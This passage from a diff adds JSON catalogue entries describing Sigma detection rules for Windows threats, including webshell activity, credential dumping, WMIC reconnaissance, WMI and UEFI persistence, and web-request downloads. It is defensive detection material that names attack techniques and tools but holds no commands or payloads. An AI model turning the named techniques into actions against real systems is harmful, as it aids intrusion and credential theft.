"Unknown" + ], + "filename": "proc_creation_win_webshell_detection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-ii.html", + "https://unit42.paloaltonetworks.com/bumblebee-webshell-xhunt-campaign/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_detection.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" + ] + }, + "uuid": "bed2a484-9348-4143-8a8a-b801c979301c", + "value": "Webshell Detection With Command Line Keywords" + }, + { + "description": "Detects certain parent child patterns found in cases in which a webshell is used to perform certain credential dumping or exfiltration activities on a compromised system", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/17", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_webshell_hacking.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://youtu.be/7aemGhaE9ds?t=641", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_hacking.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1018", + "attack.t1033", + "attack.t1087" + ] + }, + "uuid": "4ebc877f-4612-45cb-b3a5-8e3834db36c9", + "value": "Webshell Hacking Activity Patterns" + }, + { + "description": "Detects processes spawned from web servers (php, tomcat, iis...etc) that perform reconnaissance looking for the existence of popular scripting tools (perl, python, wget) on the system via the help commands", + "meta": { + "author": "Cian Heasley, Florian Roth", + "creation_date": "2020/07/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_webshell_recon_detection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://ragged-lab.blogspot.com/2020/07/webshells-automating-reconnaissance.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_recon_detection.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003" + ] + }, + "uuid": "f64e5c19-879c-4bae-b471-6d84c8339677", + "value": "Webshell Recon Detection Via CommandLine & Processes" + }, + { + "description": "Detects web servers that spawn shell processes which could be the result of a successfully placed web shell or another attack", + "meta": { + "author": "Thomas Patzke, Florian Roth, Zach Stanford @svch0st, Tim Shelton, Nasreddine Bencherchali (update)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Particular web applications may spawn a shell process legitimately" + ], + "filename": "proc_creation_win_webshell_spawn.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://media.defense.gov/2020/Jun/09/2002313081/-1/-1/0/CSI-DETECT-AND-PREVENT-WEB-SHELL-MALWARE-20200422.PDF", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_webshell_spawn.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.003", + "attack.t1190" + ] + }, + "uuid": "8202070f-edeb-4d31-a010-a26c72ac5600", + "value": "Shells Spawned by Web Servers" + }, + { + "description": "Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases)", + "meta": { + "author": "James Pemberton / @4A616D6573", + "creation_date": "2019/10/24", + "falsepositive": [ + "Use of Get-Command and Get-Help modules to reference Invoke-WebRequest and Start-BitsTransfer." + ], + "filename": "proc_creation_win_web_request_cmd_and_cmdlets.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/", + "https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_web_request_cmd_and_cmdlets.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d", + "value": "Usage Of Web Request Commands And Cmdlets" + }, + { + "description": "Detects usage of the wevtutil utility to perform reconnaissance", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/09", + "falsepositive": [ + "Legitmate usage of the utility by administrators to query the event log" + ], + "filename": "proc_creation_win_wevtutil_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wevtutil_recon.yml" + ], + "tags": [ + "attack.discovery" + ] + }, + "uuid": "beaa66d6-aa1b-4e3c-80f5-e0145369bfaf", + "value": "Wevtutil Recon" + }, + { + "description": "Detects a whoami.exe executed by privileged accounts that are often misused by threat actors", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_whoami_as_priv_user.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://nsudo.m2team.org/en-us/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_priv_user.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "79ce34ca-af29-4d0e-b832-fc1b377020db", + "value": "Run Whoami as Privileged User" + }, + { + "description": "Detects a whoami.exe executed by LOCAL SYSTEM. This may be a sign of a successful local privilege escalation.", + "meta": { + "author": "Teymur Kheirkhabarov, Florian Roth", + "creation_date": "2019/10/23", + "falsepositive": [ + "Possible name overlap with NT AUHTORITY substring to cover all languages" + ], + "filename": "proc_creation_win_whoami_as_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_as_system.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "80167ada-7a12-41ed-b8e9-aa47195c66a1", + "value": "Run Whoami as SYSTEM" + }, + { + "description": "Detects a whoami.exe executed with the /priv command line flag instructing the tool to show all current user privieleges. This is often used after a privilege escalation attempt.", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/05", + "falsepositive": [ + "Administrative activity (rare lookups on current privileges)" + ], + "filename": "proc_creation_win_whoami_priv.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/whoami", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_priv.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.discovery", + "attack.t1033" + ] + }, + "uuid": "97a80ec7-0e2f-4d05-9ef4-65760e634f6b", + "value": "Run Whoami Showing Privileges" + }, + { + "description": "Detects Task Scheduler .job import arbitrary DACL write\\par", + "meta": { + "author": "Olaf Hartong", + "creation_date": "2019/05/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_win10_sched_task_0day.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SandboxEscaper/polarbearrepo/tree/master/bearlpe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win10_sched_task_0day.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1053.005", + "car.2013-08-001" + ] + }, + "uuid": "931b6802-d6a6-4267-9ffa-526f57f22aaf", + "value": "Windows 10 Scheduled Task SandboxEscaper 0-day" + }, + { + "description": "Detects suspicious children spawned via the Windows Terminal application which could be a sign of persistence via WindowsTerminal (see references section)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/25", + "falsepositive": [ + "Other legitimate \"Windows Terminal\" profiles" + ], + "filename": "proc_creation_win_windows_terminal_susp_children.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/windowsterminalprofile.html", + "https://twitter.com/nas_bench/status/1550836225652686848", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_windows_terminal_susp_children.yml" + ], + "tags": [ + "attack.execution", + "attack.persistence" + ] + }, + "uuid": "8de89e52-f6e1-4b5b-afd1-41ecfa300d48", + "value": "Suspicious WindowsTerminal Child Processes" + }, + { + "description": "WinPEAS is a script that search for possible paths to escalate privileges on Windows hosts. The checks are explained on book.hacktricks.xyz", + "meta": { + "author": "Georg Lauenstein", + "creation_date": "2022/09/19", + "falsepositive": [ + "Other programs that use the same command line flags" + ], + "filename": "proc_creation_win_winpeas_tool.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/carlospolop/PEASS-ng", + "https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winpeas_tool.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1082", + "attack.t1087", + "attack.t1046" + ] + }, + "uuid": "98b53e78-ebaf-46f8-be06-421aafd176d9", + "value": "Detect Execution of winPEAS" + }, + { + "description": "Detects the Installation of a Exchange Transport Agent", + "meta": { + "author": "Tobias Michalski", + "creation_date": "2021/06/08", + "falsepositive": [ + "Legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this." + ], + "filename": "proc_creation_win_win_exchange_transportagent.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/blueteamsec1/status/1401290874202382336?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_win_exchange_transportagent.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1505.002" + ] + }, + "uuid": "83809e84-4475-4b69-bc3e-4aad8568612f", + "value": "MSExchange Transport Agent Installation" + }, + { + "description": "Detects execution of wmic utility with the \"computersystem\" flag in order to obtain information about the machine such as the domain, username, model...etc.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/09/08", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_computersystem_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_computersystem_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f", + "value": "Suspicious Get ComputerSystem Information with WMIC" + }, + { + "description": "Adversaries may attempt to find local system groups and permission settings.\nThe knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group.\nAdversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group.\n", + "meta": { + "author": "frack113", + "creation_date": "2021/12/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_group_recon.yml", + "level": "low", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1069.001/T1069.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_group_recon.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1069.001" + ] + }, + "uuid": "164eda96-11b2-430b-85ff-6a265c15bf32", + "value": "Suspicious Get Local Groups Information with WMIC" + }, + { + "description": "Detects wmic known recon method to look for installed hotfixes, often used by pentest and attackers enum scripts", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_hotfix_enum.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", + "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_hotfix_enum.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "dfd2fcb7-8bd5-4daa-b132-5adb61d6ad45", + "value": "WMIC Hotfix Recon" + }, + { + "description": "An adversary might use WMI to list Processes running on the compromised host or list installed Software hotfix and patches.", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_reconnaissance.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_reconnaissance.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "221b251a-357a-49a9-920a-271802777cc0", + "value": "Suspicious WMI Reconnaissance" + }, + { + "description": "An adversary might use WMI to execute commands on a remote system", + "meta": { + "author": "frack113", + "creation_date": "2022/03/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_remote_command.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://securelist.com/moonbounce-the-dark-side-of-uefi-firmware/105468/", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_command.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "e42af9df-d90b-4306-b7fb-05c863847ebd", + "value": "WMI Remote Command Execution" + }, + { + "description": "An adversary might use WMI to check if a certain Remote Service is running on a remote device.\nWhen the test completes, a service information will be displayed on the screen if it exists.\nA common feedback message is that \"No instance(s) Available\" if the service queried is not running.\nA common error message is \"Node - (provided IP or default) ERROR Description =The RPC server is unavailable\" if the provided remote host is unreachable\n", + "meta": { + "author": "frack113", + "creation_date": "2022/01/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_remote_service.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remote_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "09af397b-c5eb-4811-b2bb-08b3de464ebf", + "value": "WMI Reconnaissance List Remote Services" + }, + { + "description": "Uninstall an application with wmic", + "meta": { + "author": "frac113", + "creation_date": "2022/01/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_remove_application.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md#atomic-test-10---application-uninstall-using-wmic", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_remove_application.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "b53317a0-8acf-4fd1-8de8-a5401e776b96", + "value": "WMI Uninstall An Application" + }, + { + "description": "Detects usage of wmic to start or stop a service", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_service.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://sushant747.gitbooks.io/total-oscp-guide/content/privilege_escalation_windows.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "0b7163dc-7eee-4960-af17-c0cd517f92da", + "value": "WMIC Service Start/Stop" + }, + { + "description": "Detects wmic known recon method to look for unquoted service paths, often used by pentest and attackers enum scripts", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/20", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmic_unquoted_service_search.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/nccgroup/redsnarf/blob/35949b30106ae543dc6f2bc3f1be10c6d9a8d40e/redsnarf.py", + "https://github.com/S3cur3Th1sSh1t/Creds/blob/eac23d67f7f90c7fc8e3130587d86158c22aa398/PowershellScripts/jaws-enum.ps1", + "https://www.absolomb.com/2018-01-26-Windows-Privilege-Escalation-Guide/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_unquoted_service_search.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "68bcd73b-37ef-49cb-95fc-edc809730be6", + "value": "WMIC Unquoted Services Path Lookup" + }, + { + "description": "Detects wmiprvse spawning processes", + "meta": { + "author": "Roberto Rodriguez @Cyb3rWard0g", + "creation_date": "2019/08/15", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmiprvse_spawning_process.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://threathunterplaybook.com/notebooks/windows/02_execution/WIN-190810201010.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmiprvse_spawning_process.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047" + ] + }, + "uuid": "d21374ff-f574-44a7-9998-4a8c8bf33d7d", + "value": "Wmiprvse Spawning Process" + }, + { + "description": "Detects a WMI backdoor in Exchange Transport Agents via WMI event filters", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/10/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wmi_backdoor_exchange_transport_agent.yml", + "level": "critical", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cglyer/status/1182389676876980224", + "https://twitter.com/cglyer/status/1182391019633029120", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_backdoor_exchange_transport_agent.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.003" + ] + }, + "uuid": "797011dc-44f4-4e6f-9f10-a8ceefbe566b", + "value": "WMI Backdoor Exchange Transport Agent" + }, + { + "description": "Detects WMI script event consumers", + "meta": { + "author": "Thomas Patzke", + "creation_date": "2018/03/07", + "falsepositive": [ + "Legitimate event consumers", + "Dell computers on some versions register an event consumer that is known to cause false positives when brightness is changed by the corresponding keyboard button" + ], + "filename": "proc_creation_win_wmi_persistence_script_event_consumer.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.eideon.com/2018-03-02-THL03-WMIBackdoors/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_persistence_script_event_consumer.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1546.003" + ] + }, + "uuid": "ec1d5e28-8f3b-4188-a6f8-6e8df81dc28e", + "value": "WMI Persistence - Script Event Consumer" + }, + { + "description": "Detects WMI spawning a PowerShell process", + "meta": { + "author": "Markus Neis / @Karneades", + "creation_date": "2019/04/03", + "falsepositive": [ + "AppvClient", + "CCM" + ], + "filename": "proc_creation_win_wmi_spwns_powershell.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmi_spwns_powershell.yml" + ], + "tags": [ + "attack.execution", + "attack.t1047", + "attack.t1059.001" + ] + }, + "uuid": "692f0bec-83ba-4d04-af7e-e884a96059b6", + "value": "WMI Spawning Windows PowerShell" + }, + { + "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", + "meta": { + "author": "Nik Seetharaman, frack113", + "creation_date": "2019/01/16", + "falsepositive": [ + "Legitimate MWC use (unlikely in modern enterprise environments)" + ], + "filename": "proc_creation_win_workflow_compiler.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.specterops.io/arbitrary-unsigned-code-execution-vector-in-microsoft-workflow-compiler-exe-3d9294bc5efb", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_workflow_compiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1127", + "attack.t1218" + ] + }, + "uuid": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", + "value": "Microsoft Workflow Compiler" + }, + { + "description": "Detects execution of the binary \"wpbbin\" which is used as part of the UEFI based persistence method described in the reference section", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/18", + "falsepositive": [ + "Legitimate usage of the file by hardware manufacturer such as lenovo (Thanks @0gtweet for the tip)" + ], + "filename": "proc_creation_win_wpbbin_persistence.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://grzegorztworek.medium.com/using-uefi-to-inject-executable-files-into-bitlocker-protected-drives-8ff4ca59c94c", + "https://persistence-info.github.io/Data/wpbbin.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wpbbin_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1542.001" + ] + }, + "uuid": "4abc0ec4-db5a-412f-9632-26659cddf145", + "value": "UEFI Persistence Via Wpbbin - ProcessCreation" + }, + { + "description": "Looks for changes to registry to disable any write-protect property for storage devices. This could be a precursor to a ransomware attack and has been an observed technique used by cypherpunk group.", + "meta": { + "author": "Sreeman", + "creation_date": "2021/06/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_write_protect_for_storage_disabled.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_write_protect_for_storage_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "75f7a0e2-7154-4c4d-9eae-5cdb4e0a5c13", + "value": "Write Protect For Storage Disabled" + }, + { + "description": "Detects the presence of the keywords \"Wscript\", \"Shell\" and \"Run\" in the command, which could indicate a suspicious activity", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/31", + "falsepositive": [ + "Rare legitimate inline scripting by some administrators" + ], + "filename": "proc_creation_win_wscript_shell_cli.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wscript_shell_cli.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "2c28c248-7f50-417a-9186-a85b223010ee", + "value": "Wscript Shell Run In CommandLine" + }, + { + "description": "Detects usage of wsudo (Windows Sudo Utility). Which is a tool that let the user execute programs with different permissions (System, Trusted Installer, Administrator...etc)", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/12/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wsudo_susp_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/M2Team/Privexec/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wsudo_susp_execution.yml" + ], + "tags": [ + "attack.execution", + "attack.privilege_escalation", + "attack.t1059" + ] + }, + "uuid": "bdeeabc9-ff2a-4a51-be59-bb253aac7891", + "value": "Wsudo Suspicious Execution" + }, + { + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument which is not longer supported. This could indicate an attacker using an old technique", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/04", + "falsepositive": [ + "The \"extract\" flag still works on older 'wusa.exe' versions, which could be a legitimate use (monitor the path of the cab being extracted)" + ], + "filename": "proc_creation_win_wusa_susp_cab_extraction.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cab_extraction.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "59b39960-5f9d-4a49-9cef-1e4d2c1d0cb9", + "value": "Wusa Extracting Cab Files" + }, + { + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://www.echotrail.io/insights/search/wusa.exe/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "c74c0390-3e20-41fd-a69a-128f0275a5ea", + "value": "Wusa Extracting Cab Files From Suspicious Paths" + }, + { + "description": "Detects suspicious use of XORDump process memory dumping utility", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/28", + "falsepositive": [ + "Another tool that uses the command line switches of XORdump" + ], + "filename": "proc_creation_win_xordump.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/audibleblink/xordump", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xordump.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.t1003.001" + ] + }, + "uuid": "66e563f9-1cbd-4a22-a957-d8b7c0f44372", + "value": "XORDump Use" + }, + { + "description": "Extensible Stylesheet Language (XSL) files are commonly used to describe the processing and rendering of data within XML files. Rule detects when adversaries abuse this functionality to execute arbitrary files while potentially bypassing application whitelisting defenses.", + "meta": { + "author": "Timur Zinniatullin, oscd.community", + "creation_date": "2019/10/21", + "falsepositive": [ + "WMIC.exe FP depend on scripts and administrative methods used in the monitored environment.", + "Msxsl.exe is not installed by default, so unlikely.", + "Static format arguments - https://petri.com/command-line-wmi-part-3" + ], + "filename": "proc_creation_win_xsl_script_processing.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1220/T1220.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_xsl_script_processing.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1220" + ] + }, + "uuid": "05c36dd6-79d6-4a9a-97da-3db20298ab2d", + "value": "XSL Script Processing" + }, + { + "description": "Raw disk access using illegitimate tools, possible defence evasion", + "meta": { + "author": "Teymur Kheirkhabarov, oscd.community", + "creation_date": "2019/10/22", + "falsepositive": [ + "Legitimate Administrator using tool for raw access or ongoing forensic investigation" + ], + "filename": "raw_access_thread_disk_access_using_illegitimate_tools.yml", + "level": "low", + "logsource.category": "raw_access_thread", + "logsource.product": "windows", + "refs": [ + "https://www.slideshare.net/heirhabarov/hunting-for-credentials-dumping-in-windows-environment", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/raw_access_thread/raw_access_thread_disk_access_using_illegitimate_tools.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1006" + ] + }, + "uuid": "db809f10-56ce-4420-8c86-d6a7d793c79c", + "value": "Raw Disk Access Using Illegitimate Tools" + }, + { + "description": "Detects when an attacker registers a new AMSI provider in order to achieve persistence", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate security products adding their own AMSI providers" + ], + "filename": "registry_add_amsi_providers_persistence.yml", + "level": "high", + "logsource.category": "registry_add", + "logsource.product": "windows", + "refs": [ + "https://persistence-info.github.io/Data/amsi.html", + "https://github.com/gtworek/PSBits/blob/8d767892f3b17eefa4d0668f5d2df78e844f01d8/FakeAMSI/FakeAMSI.c", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_add/registry_add_amsi_providers_persistence.yml" + ], + "tags": [ + "attack.persistence" + ] + }, + "uuid": 